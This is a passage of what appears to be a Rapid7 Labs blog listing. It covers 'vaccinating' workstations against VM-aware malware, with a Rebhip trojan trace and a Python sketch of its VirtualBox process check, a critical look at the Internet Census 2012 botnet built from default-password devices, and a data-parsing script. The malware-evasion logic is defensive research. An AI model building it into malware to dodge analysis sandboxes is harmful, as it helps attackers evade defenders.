We intend to coordinate with other research institutions and scanning projects to be able to provide the data to everyone. We want to establish boundaries and limits on rates and frequencies for the best practices, in order to reduce the impact of this kind of research on networks and IT staff.

By leveraging the data, together we can hopefully make the Internet a little safer in the future.

Vaccinating systems against VM-aware malware

The never-ending fight with malware forced researchers and security firms to develop tools and automated systems to facilitate the unmanageable amount of work they've been facing when dissecting malicious artifacts: from debuggers, monitoring tools to virtualized systems and sandboxes. On the other side, malware authors…

The never-ending fight with malware has forced researchers and security firms to develop tools and automated systems to cope with the unmanageable amount of work they face when dissecting malicious artifacts: from debuggers and monitoring tools to virtualized systems and sandboxes. On the other side, malware authors quickly picked these up as easy indicators of anomalies distinguishing analysis systems from their target victims' machines. This initiated a still-ongoing arms race between malware writers and malware analysts, in which each new trick and technology was in turn defused by the opposite side: an anti-debugging mechanism can be evaded by hiding the debugger, detection of one virtualization product can be defeated by choosing another, obfuscation can be reversed with plugins for static analysis tools, and dead code can be eliminated with differential debugging. Basically, whenever a new "anti" functionality appears in malware, researchers try to adapt their methods to evade or defeat it. However, there is a trade-off in this arms race: often we can classify an executable as malicious more easily precisely because of the detection/evasion it implements. And if the detection mechanism has false positives, the attacker misses out on potential victims.

With malware analysis sandboxes and virtualization becoming increasingly popular for the automated analysis and processing of suspicious files, the adoption of anti-virtualization techniques by malware authors is becoming just as common. As sandbox developers ourselves, this can get quite frustrating - but what if we subvert this trend to our advantage? If all workstations in a company looked like virtualized analysis environments, they would not get infected by most VM-aware malware. Consequently, we could use this as a proactive countermeasure by placing common indicators on our systems and thereby "vaccinate" them against a large amount of malware.
We could also increase our chances by introducing fake indicators of debuggers or other analysis tools. As an example, the screenshot on the right shows the output of "pafish", a tool that checks for artifacts typical of a virtualized environment. After putting several indicators into place, pafish detects them successfully.

One can find these detection and evasion features in several malware families. Looking at an instance of the "Rebhip" trojan, we find several of these methods being used, as shown in the flow graph below. After identifying one of the malware's string comparison functions, we can trace its usage and quickly verify that it compares running process names against "VBoxService.exe" as one of its detection techniques.

...
call from 0x407819 strcmp("VBOXSERVICE.EXE", "[SYSTEM PROCESS]") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "SYSTEM") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "SMSS.EXE") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "CSRSS.EXE") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "WINLOGON.EXE") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "SERVICES.EXE") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "LSASS.EXE") = 0
call from 0x407819 strcmp("VBOXSERVICE.EXE", "VBOXSERVICE.EXE") = 1
call from 0x40d6fc ExitProcess

Therefore, in a VirtualBox virtual machine with the guest utilities installed, this specific malware sample would not conduct any malicious activity, in order to evade automated analysis. Using a debugger without hiding its presence has the same effect.

Building a small proof-of-concept tool for placing similar indicators is trivial. We put together an example that contains a few VirtualBox and VMware indicators and pushed it to a GitHub repository. It installs a few registry keys, directories and files, and spawns some processes with names related to these products, as well as a fake Olly Debugger. The repository contains a pre-built binary as well.
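The check in the trace above boils down to comparing running process names against a list of VM artifacts. A minimal sketch of that logic (the indicator names beyond VBoxService.exe are illustrative additions, not taken from the Rebhip sample):

```python
# Sketch of the VM-detection logic observed in the trace above: walk the
# process list and report whether any name matches a known VM artifact.
# The malware exits when this returns True - which is exactly why a decoy
# process with one of these names "vaccinates" a workstation against it.
VM_INDICATOR_PROCESSES = {"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe"}

def looks_like_analysis_vm(process_names):
    """Return True if any running process name matches a VM indicator."""
    return any(name.lower() in VM_INDICATOR_PROCESSES for name in process_names)

print(looks_like_analysis_vm(["smss.exe", "csrss.exe"]))            # False
print(looks_like_analysis_vm(["explorer.exe", "VBoxService.exe"]))  # True
```

On a vaccinated workstation, the second case is what VM-aware malware would see, causing it to call ExitProcess before doing any harm.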
This idea is by no means new or unique; others have used similar approaches before. Tillmann Werner and Felix Leder created "nonficker", a tool that pre-registers Conficker's mutexes on a system in order to inoculate it against Conficker infections. As a high percentage of malicious samples use mutexes to prevent double infection, one could imagine a tool that uses this technique to protect against all of those samples at the same time. Sadly, it is quite time-consuming to reconstruct the mutex generation algorithms used in the malware itself.

What do you think of the technique and the tool? Would you run this on your employee workstations to thwart infection by some VM-aware malware? If largely adopted, such techniques could make it more expensive for attackers to be successful and force them either to give up on infecting "vaccinated" systems or to abandon the use of such anti-virtualization techniques, making the lives of malware analysts and security firms much easier. While this is just a simple trick targeting a specific subset of malware in the wild, it is meant as an example of how out-of-the-box techniques and being dynamic enough could let us gain the upper hand in the struggle against malware.

UPDATE: We were pointed to a paper from 2008 describing this technique. The authors went even further, put more indicators in place, and evaluated the concept on a larger set of malware. While I did not know the paper before, I already mentioned that people had taken similar approaches and that we did not invent the method. This post's focus was to bring up the discussion again and to quickly create a small PoC that people can actually run if they want to. It's good that we have a source promising decent effectiveness of the technique - so thanks!

This is Rapid7 Labs research brought to you by Mark Schloesser and Claudio Guarnieri. Greetings to Tillmann and Felix for their great work on Conficker.

Internet Census 2012 - Thoughts

This week, an anonymous researcher published the results of an "Internet Census" - an internet-wide scan conducted using 420,000 insecure devices connected to the public internet and yielding data on used IP space, ports, device types, services and more. After scanning parts…

This week, an anonymous researcher published the results of an "Internet Census": an internet-wide scan conducted using 420,000 insecure devices connected to the public internet, yielding data on used IP space, ports, device types, services and more. After scanning parts of the internet, the researcher found thousands of insecurely configured devices using insecure / default passwords on services, and used this fact to turn those devices into scanning nodes for his project. He logged into the devices remotely, uploaded code to assist in the scans (which also included another control mechanism) and executed it. The "Internet Census 2012", as the author calls it, was published together with all its data at Internet Census 2012.

The Approach

It is interesting research, not only because of the data and findings, but also due to the techniques used to accomplish it. This is one of the few situations where a botnet was formed with good intentions and with precautions not to interfere with the normal operation of the devices being used. The research both raises awareness about the vast availability of insecure devices on the public internet and at the same time provides the data to researchers for free. Despite these good intentions, this approach is still illegal in most countries and certainly unethical as far as the security community is concerned. Using insecure configurations and default passwords to get access to remote devices without the permission of their owners is illegal and unethical; going further and pushing and running code on these devices is even worse. The "whitehat nature" of the effort does not justify the means. As far as my personal opinion goes, I respect the technical aspects of the project and think it serves a good purpose for security awareness and as a data set for further research.
On the other hand, I would never have done it this way myself because of the illegality and the ethical concerns around it, and I hope that it does not lead to too many malicious and borderline activities in the future.

Other Similar Efforts

There have been, and still are, ongoing efforts that do internet-wide surveys through legal means. These are often a bit smaller in scale due to the available resources and the costs associated with thorough scans. An example of this is the Critical Research: Internet Security Survey by HD Moore, which takes a different approach. "Critical.io", as it's known, covers a much smaller number of ports (18 vs. 700), but has been continuously scanning the internet for months, gathering trend data in addition to a per-service snapshot. In the past six months, this project has revealed a number of security issues, including that over 50 million network-enabled devices are at risk through the UPnP protocol and that thousands of organizations are at risk through misconfigured cloud storage, and it helped identify surveillance malware being used by governments around the world.

There have been other efforts that actually gave the debatable "Internet Census 2012" project its name: Information Sciences Institute - 62 Days, Almost 3 Billion Pings, New Visualization Scheme = the First Internet Census Since 1982. That project was limited in its depth, as it only focused on machines that reply to ICMP ping requests. Critical.io, Shodan, and the 2012 Census take this to another level.

The Data

As an example of what the data looks like, the following output is part of the file serviceprobes/80-TCP_GetRequest/80-TCP_GetRequest-1 in the dataset:

1355598900 5
1355618700 5
1343240100 3
1343231100 1 HTTP/1.1=20200=20OK=0D=0ADate:=20Thu,=2026=20Jul=202012=2007:05:09=20GMT=0D=0ALast-Modified:=20Tue,=2007=20Nov=202006=2003:41:23=20GMT=0D= [...]
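Assuming the four-column layout described below (IP address, timestamp, status code, quoted-printable payload) is tab-separated, filtering and decoding such lines takes only a few lines of Python. The IP address and sample line here are fabricated for illustration, not taken from the dataset:

```python
# Minimal parser for a serviceprobes-style line: keep only status-code-1
# records (the ones with an actual response) and decode the
# quoted-printable payload into raw bytes.
import quopri

def parse_probe_line(line):
    ip, timestamp, status, *payload = line.rstrip("\n").split("\t")
    if status != "1" or not payload:
        return None  # closed port / timeout / no response
    return ip, int(timestamp), quopri.decodestring(payload[0].encode("ascii"))

line = "198.51.100.7\t1355598900\t1\tHTTP/1.1=20200=20OK=0D=0A"
print(parse_probe_line(line))
# ('198.51.100.7', 1355598900, b'HTTP/1.1 200 OK\r\n')
```

Decoding up front matters because, as noted below, the raw payload may itself contain newlines once it is no longer quoted-printable encoded.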
The serviceprobes files always consist of four columns: IP address, timestamp, status code and response data (if any). If you are not interested in closed ports, timeouts or connections without responses, I recommend filtering the data to include only the status-code-1 lines that actually contain a response. The payload is stored in "quoted-printable" format, which you should decode before doing any searches for plaintext and similar analysis.

For my initial tests, I put together a script that filters the data coming from the unpacker to ignore status != 1 and also decodes the payload. When not using the quoted-printable form, one can no longer store the data in a line-based format, as the payload itself might contain newlines. I decided to quickly write out PCAP files with a crafted IP/TCP header, as there are quite good libraries and tools out there for processing data from PCAPs. You can find my small script here if you're interested. Using PCAP is certainly not optimal; some database file format or other framing would be better.

Running convert_census_probes.py in conjunction with the ZPAQ reference decoder:

unzpaq200 80-TCP_GetRequest-1.zpaq | python convert_census_probes.py 80 80-TCP_GetRequest-1-open.pcap

This leaves us with a Wireshark-readable PCAP containing the decoded payloads.

There is still more room for playing around with the dataset: putting together better processing scripts, or maybe even coming up with a way to load the data into a database for better analytical possibilities.

Next Steps

I'm going to be digging into the data more, and I expect we'll see a lot of folks in the security industry digesting and commenting on the findings in the coming weeks. I'd like to see more projects of this kind, conducted legally and sharing information about the real state of play on the internet. Ultimately we need to raise awareness about the sad state of security across almost all our devices and systems.
We have reached 2013 with our security and access protection far from where they should be. Increased awareness, updated vendor priorities and more secure development are desperately needed. These projects remind us that we should all employ monitoring tools and vulnerability management in order to identify flaws in our systems before the bad guys do.

The Malware Lifecycle - Whiteboard Wednesday

The "Malware Lifecycle" is constantly evolving - the motivations and goals have changed in the past years and are completely different than what they historically used to be. Instead of being a skill demonstration and serving as proof-of-concepts we are nowadays mostly facing financially motivated…

The "Malware Lifecycle" is constantly evolving: the motivations and goals have changed in the past years and are completely different from what they historically used to be. Instead of skill demonstrations and proof-of-concepts, we are nowadays mostly facing financially motivated threats, with even industrial and national espionage becoming part of the problem.

There are, however, a lot of possibilities for defending yourself, your company and your assets. Commercial as well as several free open source tools can help you assess the threats you face and detect malicious activity on systems and networks.

This Whiteboard Wednesday walks through the motivations, goals and techniques of malware authors and the ecosystem behind the threats. We also mention some of the things you can do against it. Additionally, it features awesome drawings by Maria Varmazis!

Interested? Check out this week's Whiteboard Wednesday here!

Make sure to give us feedback or contact us if you want to learn more and discuss best practices and options with us!
